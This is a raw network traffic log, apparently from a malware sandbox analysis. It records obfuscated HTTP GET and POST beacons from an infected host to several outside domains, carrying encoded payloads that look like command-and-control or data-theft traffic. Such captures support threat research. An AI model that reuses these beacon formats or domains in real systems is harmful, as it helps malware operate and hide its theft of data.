                                                                                                Data Ascii: IBQP=1yuTxkI0fsi1/+Q0A2NT8uWVe5Isbx3JvVUjM1lmH3K8bZFT0F+lTQoUxOBK0+1vB2umHc6d3AVJ/zyJX+hMak0cUz56Qyn7v4crDpv6K6uKFQ2macn9y8HRyt490eTYIjGnQBGGUJ2VZFg75aV0/cn1SdBIBB0XtuwuimXxcUVB0QdpV7yhFKChg7hZd/xzOULgyADiYk6an5ZLUMH6um99wvv/YRxQbApuU0DNWyIBF5XZSdk2b83gfZPYmvi6fLIERVa96M+8H2C7CZBCmzeyzhElO9aHZhp/vyfyg8yos8Ex66p5VelQ/3oREywTCmGalqJZzW6J+Y7yAi5hwa8splS/ScGAYhGDXckqyaDQFTQQBJzi9H9DuTBElWa0BM/Q4HMJGpC9dg7m3MCFnkrPpsUTOAW2as8TzIhGEQcCW2vTYNswfJOJ3dTOV/rbsTdqGA3N2IKaO/yLPnH0utlwYOv9QqjGk6PoW26lFbwF0zQXhShMxETeNRbNBHb7fY5YOXzcVE+6VNoIpP0f9IFVvOOoLnSwaBovpQeKDcIeECre22HDQpu2zsJFiZ2nC+iW69glCdfqUUpTG43+CmDzBZUjAdN9/2rsNuzQCosR+fs8BYMG5kCIZAVOeekA+ZztLRVISVS3938L8NuL1OUEpBArua+hrO2/UqWxgjRdioGBXslquX6/5rr4Iy2Tk5ppRHEpC1CNDGaGdicAtoEA7nxYyPYLsEK7mqVMCl7txl00LPWEAZnJCW0FpCWbFIYQOpYB6OMS0wm1i314y4z2vPwo7I4SxfAZFRupTGlFPPvwtigUi7YAiPh33S9k4eplJo1CTK+ukNhzKnJid3//VuQnU03CBT4zjj7woEbIbICKb5St5D5gFp4jdzkT+Ssuu20eVjqAkQdsMQ1ZlSbSbBsqv7KE6Pxn99W8Kf+XbJKjnHtXbBy8z1IqCqVOh6DDPlWPP4mFl31Tqidvhwck+33WUe1ztYhG+fFnQV0Zmhd [TRUNCATED]
                                                                                                Nov 11, 2024 17:04:08.571218967 CET5356OUTData Raw: 48 4f 76 33 67 4b 51 41 68 44 71 36 32 4d 67 2b 33 71 6c 5a 4c 35 6a 6d 47 67 36 6b 64 68 43 53 46 70 53 68 73 56 39 33 46 78 63 71 69 78 64 46 2b 50 48 61 68 73 71 4b 55 4c 35 59 51 39 4e 55 49 62 64 78 51 39 4e 54 42 33 48 74 2b 6b 62 79 6f 34
                                                                                                Data Ascii: HOv3gKQAhDq62Mg+3qlZL5jmGg6kdhCSFpShsV93FxcqixdF+PHahsqKUL5YQ9NUIbdxQ9NTB3Ht+kbyo4DTY4lIDStkVqOG9jQsAdjw5XmdlLrTov6l49fTv2M8UU3Rp5BTXbw7qV1bag+XRXbae6x3Sb+H70K7f3/GXJA8RTthWkyEarLWb19mltR+4nNztwJUJtNZ4zdTYK5ifQ3xmKf6ErG3Ca0BLCwJDil5nXjLMzC72/m


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                52192.168.11.20497993.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:11.238552094 CET499OUTGET /p1mo/?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:04:11.374330044 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:04:11 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 34 77 47 7a 79 51 34 36 51 74 58 4d 77 2f 42 69 4c 78 6c 35 30 4e 53 62 52 4a 6b 45 58 78 76 63 68 32 49 44 41 32 42 4a 50 48 66 48 66 62 78 50 36 46 71 58 52 6d 42 7a 2f 4e 4e 33 34 4e 4a 73 41 47 37 36 41 4e 75 6d 38 69 39 67 30 58 36 33 58 74 64 6c 43 67 78 72 4b 6d 41 43 63 77 79 75 67 6f 63 41 43 4e 65 65 62 71 2b 31 62 6a 6d 73 5a 62 58 65 34 4c 6b 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                53192.168.11.204980485.159.66.9380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:42.569380999 CET502OUTGET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.kikaraofficial.xyz
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:04:42.827742100 CET225INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.14.1
                                                                                                Date: Mon, 11 Nov 2024 16:04:42 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                X-Rate-Limit-Limit: 5s
                                                                                                X-Rate-Limit-Remaining: 19
                                                                                                X-Rate-Limit-Reset: 2024-11-11T16:04:47.7048831Z


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                54192.168.11.20498053.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:47.985476971 CET756OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 6f 79 46 6c 75 47 6f 71 41 6a 48 4b 78 71 73 68 4e 4d 48 71 47 64 4f 73 4f 44 69 6c 67 32 59 53 32 35 4f 72 75 39 4d 2b 67 56 74 76 47 69 6c 32 31 4a 47 63 43 5a 31 44 70 44 4a 51 70 73 49 31 49 51 46 6c 59 74 58 63 51 76 6d 6f 38 5a 6b 30 56 79 32 37 31 72 42 70 79 58 6a 57 32 6f 4d 6c 32 56 69 4e 4e 75 62 39 5a 2b 49 75 77 6c 4c 73 34 2b 47 76 30 2f 53 71 30 45 4a 75 57 71 39 37 48 66 4f 70 79 58 2f 4f 58 57 4d 6c 79 75 4a 68 30 77 78 35 4c 4e 6e 66 79 59 61 38 35 75 55 43 36 58 41 66 52 57 67 38 4f 44 43 4b 58 57 71 34 47 2f 57 42 6b 77 3d 3d
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmoyFluGoqAjHKxqshNMHqGdOsODilg2YS25Oru9M+gVtvGil21JGcCZ1DpDJQpsI1IQFlYtXcQvmo8Zk0Vy271rBpyXjW2oMl2ViNNub9Z+IuwlLs4+Gv0/Sq0EJuWq97HfOpyX/OXWMlyuJh0wx5LNnfyYa85uUC6XAfRWg8ODCKXWq4G/WBkw==


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                55192.168.11.20498063.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:51.667788982 CET776OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 71 52 64 6c 69 46 77 71 56 54 48 4a 74 36 73 68 47 73 47 6a 47 64 79 73 4f 47 53 4d 68 45 73 53 33 62 57 72 74 35 59 2b 6a 56 74 76 4f 43 6c 2f 37 70 47 48 43 59 4a 6c 70 41 52 51 70 73 63 31 49 56 35 6c 59 65 2f 64 51 2f 6d 75 78 35 6b 32 57 43 32 37 31 72 42 70 79 58 32 37 32 6f 6b 6c 32 6c 53 4e 4e 50 62 2b 46 75 49 74 78 6c 4c 73 70 4f 47 72 30 2f 53 4d 30 46 56 58 57 76 35 37 48 65 2b 70 33 53 66 50 63 57 4e 75 39 4f 49 45 78 44 31 33 4d 39 44 2b 31 4b 61 73 31 74 63 6b 79 68 4e 46 4d 6b 55 59 4e 51 65 34 54 6d 54 51 45 39 58 61 35 35 6d 78 53 63 2b 4b 71 4c 32 4e 43 72 72 4e 63 58 48 58 76 57 51 3d
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmqRdliFwqVTHJt6shGsGjGdysOGSMhEsS3bWrt5Y+jVtvOCl/7pGHCYJlpARQpsc1IV5lYe/dQ/mux5k2WC271rBpyX272okl2lSNNPb+FuItxlLspOGr0/SM0FVXWv57He+p3SfPcWNu9OIExD13M9D+1Kas1tckyhNFMkUYNQe4TmTQE9Xa55mxSc+KqL2NCrrNcXHXvWQ=


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                56192.168.11.20498073.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:54.341337919 CET2578OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 71 52 64 6c 69 46 77 71 56 54 48 4a 74 36 73 68 47 73 47 6a 47 64 79 73 4f 47 53 4d 68 45 30 53 32 6f 65 72 74 65 6b 2b 69 56 74 76 45 69 6c 36 37 70 48 48 43 59 52 68 70 48 5a 41 70 75 6b 31 4a 7a 4e 6c 65 76 2f 64 44 66 6d 75 74 4a 6b 33 56 79 32 75 31 72 78 74 79 58 6d 37 32 6f 6b 6c 32 6d 4b 4e 4c 65 62 2b 56 65 49 75 77 6c 4c 6f 34 2b 48 4d 30 2f 4c 33 30 46 42 48 57 62 4e 37 48 2b 75 70 77 32 2f 50 56 57 4e 73 34 4f 49 6d 78 45 38 31 4d 39 50 79 31 4b 65 43 31 75 73 6b 33 46 74 54 5a 46 49 75 4f 6a 69 44 5a 47 76 54 47 76 54 49 2b 62 4b 57 43 4f 61 44 6b 4d 6d 6d 46 70 6a 51 50 30 72 42 73 69 31 42 70 47 66 69 37 77 59 52 37 58 6d 49 49 7a 75 66 32 4c 78 73 53 64 63 51 35 4e 45 63 45 45 72 6d 6d 36 2f 43 65 6f 67 78 36 45 34 71 54 4d 52 32 50 2f 6b 72 4d 2f 77 70 47 49 68 6b 6a 55 61 61 63 32 67 6f 54 78 49 79 74 67 33 39 64 2b 7a 5a 30 62 4f 6c 43 54 6a 51 6c 78 6f 59 7a 63 6a 73 77 2f 58 4f 73 36 64 5a 76 58 53 77 42 61 53 72 6c 75 4d 6a 46 [TRUNCATED]
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmqRdliFwqVTHJt6shGsGjGdysOGSMhE0S2oertek+iVtvEil67pHHCYRhpHZApuk1JzNlev/dDfmutJk3Vy2u1rxtyXm72okl2mKNLeb+VeIuwlLo4+HM0/L30FBHWbN7H+upw2/PVWNs4OImxE81M9Py1KeC1usk3FtTZFIuOjiDZGvTGvTI+bKWCOaDkMmmFpjQP0rBsi1BpGfi7wYR7XmIIzuf2LxsSdcQ5NEcEErmm6/Ceogx6E4qTMR2P/krM/wpGIhkjUaac2goTxIytg39d+zZ0bOlCTjQlxoYzcjsw/XOs6dZvXSwBaSrluMjFXCWF01Yjc/IDGRcuYpUAydceDeJpIAlSdHBc2VETQlrywDp0KLEoKjzbGIgIIMJ/gGiJCozws3iqIQp0msagDZP1J/dY4Qdy3AmpPeCRtvz9M97mWWjT6E5FSnyIMF3lU3Ejzd0OMi+SAw3I9RxjJsDaDD/rXVeUVXcWNWZiYVRLtarA6BOmGLcC6M8FGW/HWQKkMiov9L1rJ0op8Hw2ZCo/m8cY81DEz6Df8Nrm7N095ytDSt2BkhO9BUqk01MZDqC06v8zUqND0Y1reHauUh2AEBKuO6LOVicw7hBE8QcAhAr3FxqcfPyocV+EIUuN+NdMzrvtbsECI1i3vsFybyqGxds8vfVLBm2mmOAhI544GvOI8ihyE1gEMFI43DOAolKCAlsdaAlsUguPgesFXkjmZrvwnksYC7TXySGJJTat+2I0GXmefalT+z9zAIgEndnEjoO6XbUyahq3R9S8HWEHiOpDLvMZnsw9wOjVitUxf0bEz2Q2kAvBpgMLkWlt6E0EZVOCEjXP3q+1ZK/I8f1kaxkrsRH+EjHXEb2I7mQPFSpG2C0Yz7Cusuk4n6pyu2R3Gn2E8Ul63TZj2hlZCb59Z+nP3b5RIZscYcXMrDntii2DxYcSvtmfLGAoXa4y+nGWy4ZwqwHgWzGI45BxD4JVdIvzoLm4Zw [TRUNCATED]
                                                                                                Nov 11, 2024 17:04:54.341358900 CET3867OUTData Raw: 59 56 66 54 37 50 6a 41 43 61 33 35 52 32 5a 72 4d 33 48 7a 6f 64 6a 31 58 59 70 59 42 4f 41 73 75 2f 63 41 45 4f 32 30 41 74 36 6d 6d 44 4f 4f 55 56 42 76 4a 71 34 49 52 4f 35 4f 49 67 54 61 45 37 45 50 61 6f 56 65 44 51 64 55 70 50 58 34 74 54
                                                                                                Data Ascii: YVfT7PjACa35R2ZrM3Hzodj1XYpYBOAsu/cAEO20At6mmDOOUVBvJq4IRO5OIgTaE7EPaoVeDQdUpPX4tTX0tjiBFLo+1GvXStxDZVg6KKTtwuNFP7MHriupQhER9e2+k/NDgLap/KS393F0sh5DanqaYVZg8ayTjOXQ4b3hxHDwqdTcMgWjEsKW2KSu56zkcFqqBpUXx+NT9AyHVaiBIVYX8AzDUPh6f4ezwo/WTu/dqwLXf4P
                                                                                                Nov 11, 2024 17:04:54.341432095 CET1289OUTData Raw: 31 74 65 38 69 46 33 42 50 45 4e 77 30 2f 52 4e 39 58 51 42 63 2f 30 6f 47 58 77 73 38 72 4d 77 39 68 64 6c 62 6d 75 47 41 77 76 48 57 41 64 36 4b 66 41 55 69 6d 66 65 4b 38 49 33 66 64 64 67 65 30 33 71 61 69 71 34 42 57 33 74 76 4e 4f 4c 4f 57
                                                                                                Data Ascii: 1te8iF3BPENw0/RN9XQBc/0oGXws8rMw9hdlbmuGAwvHWAd6KfAUimfeK8I3fddge03qaiq4BW3tvNOLOWjHkUC3Dm8Mor3RYmJVZ6G53TKitLKlBdTtwjneN5UfljNkC/A6fLfAwSkC9uJqOqKOBxQgEgamgv6+cqvs/twWie6dg51WZ5epMNzf0R0cVChM3Vpud0DnPT7qD4IsHcbbrECo6Ubxby80eKIgxn9c6WuZ1K58OO5
                                                                                                Nov 11, 2024 17:04:54.341604948 CET191OUTData Raw: 73 6b 33 71 4e 63 72 48 49 41 41 4a 66 57 6e 52 78 6b 49 4c 63 55 59 61 47 48 43 55 6c 38 6c 64 52 6b 4c 4d 49 6b 54 42 68 57 77 44 74 39 66 6c 71 4a 63 4d 4e 46 67 64 43 46 6a 73 34 66 64 30 66 49 4a 30 42 75 73 42 51 55 48 48 43 30 43 41 31 5a
                                                                                                Data Ascii: sk3qNcrHIAAJfWnRxkILcUYaGHCUl8ldRkLMIkTBhWwDt9flqJcMNFgdCFjs4fd0fIJ0BusBQUHHC0CA1ZCYsqBqttbLXiI/35qUyty/wjRduqyhTPepwDy+4fh8EWMk0r5bX2smO5MXPP8jT3hPizNMU0G27xm4M5QHzdL9FBrXi4Q4fFohJnHp7AU5w==


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                57192.168.11.20498083.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:04:57.016514063 CET496OUTGET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:04:57.152563095 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:04:57 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 51 70 54 4a 37 6d 33 47 57 32 53 42 70 54 51 2f 70 6e 5a 49 4f 56 79 75 6d 36 4d 31 4f 4f 48 43 4b 63 6d 6d 4a 53 2b 32 6b 58 31 32 37 5a 69 70 76 73 77 34 72 7a 70 76 48 57 70 38 7a 63 47 77 4c 49 4e 7a 36 44 78 67 6e 75 51 73 47 68 77 43 44 4d 6d 58 63 61 47 54 79 6f 52 47 51 42 32 31 35 62 35 66 79 57 6e 62 2f 35 6b 79 30 6b 79 36 4e 66 62 55 53 6f 51 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                58192.168.11.20498093.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:02.310331106 CET750OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 2f 49 63 33 76 32 53 4f 50 36 6b 78 62 54 2f 54 74 49 52 65 4b 48 39 4e 6b 74 33 30 41 61 42 45 70 50 52 62 6c 67 6b 6b 6d 53 47 53 6f 42 54 78 37 4a 74 6e 76 42 79 6e 42 67 7a 62 4c 6e 70 72 79 4c 65 41 6c 72 38 51 30 45 36 43 78 59 4b 6e 33 5a 6b 76 4c 2f 46 58 45 35 47 34 63 67 6f 53 71 38 65 63 75 51 72 44 41 59 6f 30 71 70 4a 58 4d 2b 2b 42 6a 31 5a 61 4e 4f 50 79 32 32 71 48 47 45 7a 36 5a 45 56 69 63 36 39 6b 35 36 53 31 37 58 71 45 57 54 4a 49 6f 71 59 48 70 70 68 46 5a 49 37 41 76 6c 7a 74 76 32 69 79 52 34 66 57 65 4f 7a 76 67 3d 3d
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsq/Ic3v2SOP6kxbT/TtIReKH9Nkt30AaBEpPRblgkkmSGSoBTx7JtnvBynBgzbLnpryLeAlr8Q0E6CxYKn3ZkvL/FXE5G4cgoSq8ecuQrDAYo0qpJXM++Bj1ZaNOPy22qHGEz6ZEVic69k56S17XqEWTJIoqYHpphFZI7Avlztv2iyR4fWeOzvg==


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                59192.168.11.20498103.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:04.980735064 CET770OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 66 34 63 31 49 71 53 66 66 36 6a 2f 37 54 2f 63 4e 49 64 65 4b 62 39 4e 68 4a 64 30 7a 2b 42 45 4d 7a 52 59 67 41 6b 6c 6d 53 47 59 49 41 5a 76 4c 4a 6b 6e 76 4e 51 6e 41 4d 7a 62 4c 7a 70 72 78 66 65 42 53 33 2f 52 6b 45 34 4f 52 59 4d 6a 33 5a 6b 76 4c 2f 46 58 45 38 62 34 63 34 6f 53 61 73 65 64 50 51 73 4f 67 59 70 6a 61 70 4a 54 4d 2b 36 42 6a 30 30 61 4a 47 31 79 31 4f 71 48 48 30 7a 6a 72 38 61 35 73 36 6e 67 35 37 68 30 71 79 43 46 6d 66 76 4e 37 43 69 49 36 78 71 45 50 46 68 64 64 52 58 75 38 71 51 32 68 42 33 55 63 50 6f 79 67 7a 54 6f 55 74 68 67 63 68 31 59 33 32 47 79 64 57 31 35 6c 51 3d
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsqf4c1IqSff6j/7T/cNIdeKb9NhJd0z+BEMzRYgAklmSGYIAZvLJknvNQnAMzbLzprxfeBS3/RkE4ORYMj3ZkvL/FXE8b4c4oSasedPQsOgYpjapJTM+6Bj00aJG1y1OqHH0zjr8a5s6ng57h0qyCFmfvN7CiI6xqEPFhddRXu8qQ2hB3UcPoygzToUthgch1Y32GydW15lQ=


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                60192.168.11.20498113.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:07.650649071 CET1289OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 66 34 63 31 49 71 53 66 66 36 6a 2f 37 54 2f 63 4e 49 64 65 4b 62 39 4e 68 4a 64 30 7a 32 42 46 36 6e 52 59 47 49 6b 69 6d 53 47 47 59 41 55 76 4c 49 30 6e 75 6c 55 6e 42 77 4a 62 4f 33 70 71 52 44 65 47 6d 44 2f 66 6b 45 34 47 78 59 4e 6e 33 5a 78 76 4c 76 42 58 46 4d 62 34 63 34 6f 53 63 6f 65 61 65 51 73 64 51 59 6f 30 71 70 4e 58 4d 2b 57 42 6a 64 42 61 4a 4c 58 79 46 75 71 48 6b 63 7a 34 34 45 61 31 73 36 35 6c 35 37 35 30 71 4f 64 46 69 33 72 4e 36 32 45 49 38 56 71 48 59 39 32 45 65 5a 73 73 4e 2f 66 2b 56 46 51 65 66 76 59 79 7a 44 4d 74 43 39 70 68 61 35 69 48 47 66 4d 6c 39 4c 31 6e 51 49 76 34 68 34 36 69 54 41 33 2f 30 53 31 46 49 39 67 6e 6a 34 72 50 37 57 59 2f 4d 4e 71 73 48 6e 38 64 36 7a 77 33 55 36 72 6d 71 45 4f 57 7a 6e 35 68 49 45 6c 55 46 4e 6f 51 49 77 34 45 2f 47 57 5a 4e 57 4f 35 64 39 4e 4d 45 49 73 79 42 38 6b 36 66 71 7a 5a 32 79 69 4a 7a 61 30 6e 76 6b 42 48 51 36 74 75 6d 32 38 58 32 63 70 61 6a 71 4e 68 70 50 61 53 [TRUNCATED]
